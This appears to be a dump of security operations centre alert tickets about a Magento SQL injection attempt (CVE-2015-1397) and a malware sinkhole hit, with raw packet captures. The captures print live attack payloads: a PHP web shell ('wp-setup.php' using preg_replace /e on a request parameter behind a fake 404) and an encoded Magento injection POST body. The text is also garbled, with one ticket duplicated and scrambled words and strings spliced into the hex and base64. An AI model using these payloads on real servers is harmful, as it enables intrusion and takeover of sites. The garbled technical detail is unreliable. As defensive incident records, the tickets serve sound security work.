3d22 ile";.filename="\r\n000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php"..c\r\n000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex\r\n000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....<?php\r\n000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re\r\n000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e'])).\r\n000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header("http/1.0\r\n000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found")\r\n000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(\r\n000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re\r\n0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'\r\n0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?>..--ba7336\r\n0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb\r\n0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--..\r\n==pcap 1 hex e== 1417
4087 source ip : 172.20.10.37 , 208.211.136.158\nsystem name : whqsm010 , reference.company.com (\nuser name: n/a\nlocation : dmz\nsep , sms status : \nfield sales user ( yes / no) : \ndsw event log: see below\n\n**\n\nthe ctoc has received at least 4 occurrences of '52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound (cve-2015-1397)' alerts from your isensor device (208.211.136.207/isensplant_247.company.com) for traffic (not blocked) sourcing from port 55334/tcp of 166.78.155.100 (dallas, usa) destined to port 80/tcp of 208.211.136.158 (usa, usa) that occurred on 2016-09-17 at 11:35:02. this indicates that the external host at 166.78.155.100 and possibly other sources are attempting to discover if your public facing servers including 208.211.136.158 is vulnerable to the "magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability" described in cve-2015-1397.\n\nthis ticket will effectively serve as a master ticket for any related alerts until we receive feedback from you on how to handle these events going forward. please let us know either by corresponding to us via this ticket and delegating the ticket back to the ctoc, or by calling us at we have a number of options available for the handling of future alerts such as this one:\n\n1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted.\n2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). \n3) full escalation via a high priority ticket and a phone call for each unique source ip address. \n\nwe would not recommend options 2 and 3 since the exploit code is in the wild and merely identifying the sources of the attack may not be very useful, and we can always run reports on the portal to identify a list of attackers. instead we would recommend auditing your environment for vulnerable systems and updating them as necessary. once you have completed this, you could go with option 1 to suppress alerting on these events.\n\nsincerely,\n ctoc\n\n\n=========================\ntechnical details\n=========================\na vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems.\nmagento is an eusa platform. a vulnerability exists in magento commstorage_product edition (ce) versions 1.4.00 through 1.5.0.1, version 1.5.1.0, versions 1.6.0.x, versions 1.6.1.x through 1.6.2.x, versions 1.7.x, and versions 1.8.x and 1.9.x and in magento enterprise edition (ee) versions prior to 1.14.2.0 due to insufficient input validation. user-controllable supplied via the 'popularity[field_expr]' paramdntyeter, when the 'popularity[from]' or 'popularity[to]' paramdntyeter is set, is not properly sanitized for illegal or malicious content by the mage_adminhtml_block_widget_grid::getcsvfile() function prior to being stored in a $fieldname variable and used in an sql query. remote administrators could leverage this issue to conduct sql injection attacks by injectncqulao qauighdplicious sql code into an affected input. successful exploitation may permit an attacker to manipulate sql queries and execute arbitrary sql commands on the underlying database.\n\n=========================\nreferences\n=========================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n=========================\nevent data\n=========================\nrelated events: \nevent id: 44717197\nevent summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound\noccurrence count: 4\nevent count: 4\n\nhost and connection information\nsource ip: 166.78.155.100\nsource port: 55334\nsource ip geolocation: dallas, usa\ndestination ip: 208.211.136.158\ndestination port: 80\ndestination ip geolocation: usa, usa\nconnection directionality: incoming\nprotocol: tcp\nhttp method: post\nhost: www.company.de\nfull url path: /admin/cms_wysiwyg/directive/index/\n\ndevice information\ndevice ip: 208.211.136.207\ndevice name: isensplant_247.company.com\nlog time: 2016-09-17 at 11:35:02 utc\naction: not blocked\nvendor eventid: 393369\ncvss score: 6.5 \nvendor priority: 2\nvendor version: 7\n\nscwx event processing information\nsherlock rule id (sle): 2161562\ninspector event id: 63726775\nontology id: 200020003203759378\nevent type id: 200020003203707850\nagent id: 102989\n\nevent detail:\n[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]\n[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\n[sensor id: 602981][event id: 393369][time: 2585223213.930745]\n[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]\n09/17/2016-11:35:02.930745 166.78.155.100:55334 -> 208.211.136.158:80\ntcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df\n***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32\ntcp options (3) => nop nop ts: 4341465171 309732804 \n==pcap 1==\n\n\n[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]\n\n[ex http_hostname 10: www.company.de]\n\n[o:security]\n\nascii packet(s):\n==pcap 1 ascii s==\n....f*.w.3..........e...iu@.6.;..n.d.....&.pyx#.kn.......9........j....apost./admin/cms_wysiwyg/directive/index/.http/1.1..host:.www.company.de..accept:.*/*..content-length:.1022..content-type:.application/x-www-form-urlencoded....filter=cg9wdwxhcml0evtmcm9txt0wjnbvchvsyxjpdhlbdg9dptmmcg9wdwxhcml0evtmawvszf9lehbyxt0wktttrvqgqfnbtfqgpsancnano1nfvcbaueftuya9ienptknbvchnrduoq09oq0fukcbau0fmvcasicd0zw1wzwsnkerplcbdt05dqvqojzonlcbau0fmvcapktttruxfq1qgqevyvfjbido9ie1bwchlehryyskgrljptsbhzg1pbl91c2vyifdirvjfigv4dhjhieltie5pvcbovuxmo0lou0vsvcbjtlrpigbhzg1pbl91c2vyycaoygzpcnn0bmftzwasigbsyxn0bmftzwasygvtywlsycxgdxnlcm5hbwvglgbwyxnzd29yzgasygnyzwf0zwrglgbsb2dudfrtglgbyzwxvywrfywnsx2zsywdglgbpc19hy3rpdmvglgblehryywasyhjwx3rva2vuycxgcnbfdg9rzw5fy3jlyxrlzf9hdgapifzbtfvfuyaoj0zpcnn0bmftzscsj0xhc3ruyw1ljywnc2vjdxjpdhlabwfnzw50b2nvbw1lcmnllmnvbscsj3bvbgljescsqfbbu1mstk9xkcksmcwwldesqevyvfjble5vtewsie5pvygpkttjtlnfulqgsu5utybgywrtaw5fcm9szwagkhbhcmvudf9pzcx0cmvlx2xldmvslhnvcnrfb3jkzxisupply_chain9szv90exbllhvzzxjfawqsupply_chain9szv9uyw1lksbwquxvrvmgkdesmiwwlcdvjywou0vmrunuihvzzxjfawqgrljptsbhzg1pbl91c2vyifdirvjfihvzzxjuyw1lid0gj3bvbgljescplcdgaxjzdg5hbwunkts=&___directive=e3tibg9jayb0exblpufkbwluahrtbc9yzxbvcnrfc2vhcmnox2dyawqgb3v0chv0pwdldenzdkzpbgv9fq==&forwarded=1&\n==pcap 1 ascii e==\n\nhex packet(s):\n==pcap 1 hex s==\n000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......\n000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;.\n000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&.pyx#.\n000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......\n000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad\n000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/\n000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/\n000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:\n000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company.\n000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*.\n0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:\n0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t\n0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application\n0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle\n0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter\n0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt\n000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv\n000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm\n000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt\n000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0\n000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq\n000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb\n000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn\n000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f\n000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd\n000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb\n0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb\n0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux\n0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido\n0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk\n0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9\n0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv\n000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb\n000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb\n000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9\n000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn\n000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn\n000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl\n000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv\n000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga\n000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb\n000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx\n0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd\n0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv\n0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj\n0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb\n0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr\n0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv\n000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf\n000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1\n000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl\n000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1\n000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b\n000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m\n000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde\n000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew\n000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln\n000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr\n0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb\n0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv\n0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr\n0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9\n0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq\n0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb\n000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw\n000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun\n000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj\n000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v\n000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj\n000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl\n000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5\n000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&___dir\n000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja\n000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua\n0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc\n0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb\n0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd\n0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&forw\n0004e0 6172 6465 643d 3126 arded=1&\n==pcap 1 hex e==\n[[3 of 4 events not shown due to space constraints]]\ntake action\n\nticket action: 1398
4089 source ip : 172.20.10.37 , 208.211.136.158\nsystem name : whqsm010 , reference.company.com (\nuser name: n/a\nlocation : dmz\nsep , sms status : \nfield sales user ( yes / no) : \ndsw event log: see below\n\n**\n\nthe ctoc has received at least 4 occurrences of '52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound (cve-2015-1397)' alerts from your isensor device (208.211.136.207/isensplant_247.company.com) for traffic (not blocked) sourcing from port 55334/tcp of 166.78.155.100 (dallas, usa) destined to port 80/tcp of 208.211.136.158 (usa, usa) that occurred on 2016-09-17 at 11:35:02. this indicates that the external host at 166.78.155.100 and possibly other sources are attempting to discover if your public facing servers including 208.211.136.158 is vulnerable to the "magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability" described in cve-2015-1397.\n\nthis ticket will effectively serve as a master ticket for any related alerts until we receive feedback from you on how to handle these events going forward. please let us know either by corresponding to us via this ticket and delegating the ticket back to the ctoc, or by calling us at. we have a number of options available for the handling of future alerts such as this one:\n\n1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted.\n2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). \n3) full escalation via a high priority ticket and a phone call for each unique source ip address. \n\nwe would not recommend options 2 and 3 since the exploit code is in the wild and merely identifying the sources of the attack may not be very useful, and we can always run reports on the portal to identify a list of attackers. instead we would recommend auditing your environment for vulnerable systems and updating them as necessary. once you have completed this, you could go with option 1 to suppress alerting on these events.\n\nsincerely,\n ctoc\n\n\n=========================\ntechnical details\n=========================\na vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems.\nmagento is an eusa platform. a vulnerability exists in magento commstorage_product edition (ce) versions 1.4.00 through 1.5.0.1, version 1.5.1.0, versions 1.6.0.x, versions 1.6.1.x through 1.6.2.x, versions 1.7.x, and versions 1.8.x and 1.9.x and in magento enterprise edition (ee) versions prior to 1.14.2.0 due to insufficient input validation. user-controllable supplied via the 'popularity[field_expr]' paramdntyeter, when the 'popularity[from]' or 'popularity[to]' paramdntyeter is set, is not properly sanitized for illegal or malicious content by the mage_adminhtml_block_widget_grid::getcsvfile() function prior to being stored in a $fieldname variable and used in an sql query. remote administrators could leverage this issue to conduct sql injection attacks by injectncqulao qauighdplicious sql code into an affected input. successful exploitation may permit an attacker to manipulate sql queries and execute arbitrary sql commands on the underlying database.\n\n=========================\nreferences\n=========================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n=========================\nevent data\n=========================\nrelated events: \nevent id: 44717197\nevent summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound\noccurrence count: 4\nevent count: 4\n\nhost and connection information\nsource ip: 166.78.155.100\nsource port: 55334\nsource ip geolocation: dallas, usa\ndestination ip: 208.211.136.158\ndestination port: 80\ndestination ip geolocation: usa, usa\nconnection directionality: incoming\nprotocol: tcp\nhttp method: post\nhost: www.company.de\nfull url path: /admin/cms_wysiwyg/directive/index/\n\ndevice information\ndevice ip: 208.211.136.207\ndevice name: isensplant_247.company.com\nlog time: 2016-09-17 at 11:35:02 utc\naction: not blocked\nvendor eventid: 393369\ncvss score: 6.5 \nvendor priority: 2\nvendor version: 7\n\nscwx event processing information\nsherlock rule id (sle): 2161562\ninspector event id: 63726775\nontology id: 200020003203759378\nevent type id: 200020003203707850\nagent id: 102989\n\nevent detail:\n[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]\n[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\n[sensor id: 602981][event id: 393369][time: 2585223213.930745]\n[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]\n09/17/2016-11:35:02.930745 166.78.155.100:55334 -> 208.211.136.158:80\ntcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df\n***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32\ntcp options (3) => nop nop ts: 4341465171 309732804 \n==pcap 1==\n\n\n[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]\n\n[ex http_hostname 10: www.company.de]\n\n[o:security]\n\nascii packet(s):\n==pcap 1 ascii s==\n....f*.w.3..........e...iu@.6.;..n.d.....&.pyx#.kn.......9........j....apost./admin/cms_wysiwyg/directive/index/.http/1.1..host:.www.company.de..accept:.*/*..content-length:.1022..content-type:.application/x-www-form-urlencoded....filter=cg9wdwxhcml0evtmcm9txt0wjnbvchvsyxjpdhlbdg9dptmmcg9wdwxhcml0evtmawvszf9lehbyxt0wktttrvqgqfnbtfqgpsancnano1nfvcbaueftuya9ienptknbvchnrduoq09oq0fukcbau0fmvcasicd0zw1wzwsnkerplcbdt05dqvqojzonlcbau0fmvcapktttruxfq1qgqevyvfjbido9ie1bwchlehryyskgrljptsbhzg1pbl91c2vyifdirvjfigv4dhjhieltie5pvcbovuxmo0lou0vsvcbjtlrpigbhzg1pbl91c2vyycaoygzpcnn0bmftzwasigbsyxn0bmftzwasygvtywlsycxgdxnlcm5hbwvglgbwyxnzd29yzgasygnyzwf0zwrglgbsb2dudfrtglgbyzwxvywrfywnsx2zsywdglgbpc19hy3rpdmvglgblehryywasyhjwx3rva2vuycxgcnbfdg9rzw5fy3jlyxrlzf9hdgapifzbtfvfuyaoj0zpcnn0bmftzscsj0xhc3ruyw1ljywnc2vjdxjpdhlabwfnzw50b2nvbw1lcmnllmnvbscsj3bvbgljescsqfbbu1mstk9xkcksmcwwldesqevyvfjble5vtewsie5pvygpkttjtlnfulqgsu5utybgywrtaw5fcm9szwagkhbhcmvudf9pzcx0cmvlx2xldmvslhnvcnrfb3jkzxisupply_chain9szv90exbllhvzzxjfawqsupply_chain9szv9uyw1lksbwquxvrvmgkdesmiwwlcdvjywou0vmrunuihvzzxjfawqgrljptsbhzg1pbl91c2vyifdirvjfihvzzxjuyw1lid0gj3bvbgljescplcdgaxjzdg5hbwunkts=&___directive=e3tibg9jayb0exblpufkbwluahrtbc9yzxbvcnrfc2vhcmnox2dyawqgb3v0chv0pwdldenzdkzpbgv9fq==&forwarded=1&\n==pcap 1 ascii e==\n\nhex packet(s):\n==pcap 1 hex s==\n000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......\n000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;.\n000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&.pyx#.\n000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......\n000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad\n000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/\n000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/\n000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:\n000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company.\n000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*.\n0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:\n0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t\n0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application\n0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle\n0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter\n0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt\n000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv\n000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm\n000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt\n000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0\n000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq\n000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb\n000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn\n000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f\n000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd\n000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb\n0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb\n0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux\n0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido\n0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk\n0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9\n0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv\n000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb\n000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb\n000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9\n000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn\n000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn\n000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl\n000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv\n000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga\n000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb\n000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx\n0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd\n0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv\n0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj\n0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb\n0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr\n0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv\n000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf\n000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1\n000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl\n000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1\n000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b\n000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m\n000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde\n000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew\n000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln\n000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr\n0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb\n0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv\n0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr\n0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9\n0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq\n0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb\n000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw\n000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun\n000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj\n000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v\n000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj\n000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl\n000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5\n000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&___dir\n000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja\n000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua\n0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc\n0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb\n0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd\n0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&forw\n0004e0 6172 6465 643d 3126 arded=1&\n==pcap 1 hex e==\n[[3 of 4 events not shown due to space constraints]]\ntake action\n\nticket action: 1397
7989 source ip : 61.01.52.02617\r\nsystem name : lpawx210968sf\r\nuser name: n/a\r\nlocation : indaituba\r\nsep , sms status : n/a\r\nfield sales user ( yes / no) : no\r\ndsw event log: see below\r\n\r\n**\r\n\r\n=========================\r\nincident overview\r\n=========================\r\nwe are seeing your 10.32.100.17/isensor03.company.com device generating '51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.38.137.100 to port 3720/tcp of your lpawx210968sf/61.01.52.02617 device indicating that the host is most likely infected with malware. \r\n\r\nthis return traffic indicates that lpawx210968sf/61.01.52.02617 has most likely attempted to visit a domain name which is being sinkholed. dns sinkholes are dns servers that give out false information in order to prevent the use of the domain for which ip address resolution has been requested. sinkhole traffic is a possible indicator of an infected computer that is reaching out to a controller that has been taken over by a law enforcement or research organization as part of a malware mitigation effort. traffic to a sinkhole should be examined for characteristics of automated activity. in some cases, an administrator may be curious about a particular domain and browse to it, triggering the signature. repeated automated requests to a sinkhole, however, are a clear indication of a malware infection.\r\n\r\nwe are escalating this incident to you via a high priority ticket per our default escalation policies. if you would like us to handle these incidents differently in the future (see below for handling options), or if you have any further questions or concerns, please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at . \r\n1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))\r\n2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)\r\n\r\nsincerely,\r\nsecureworks 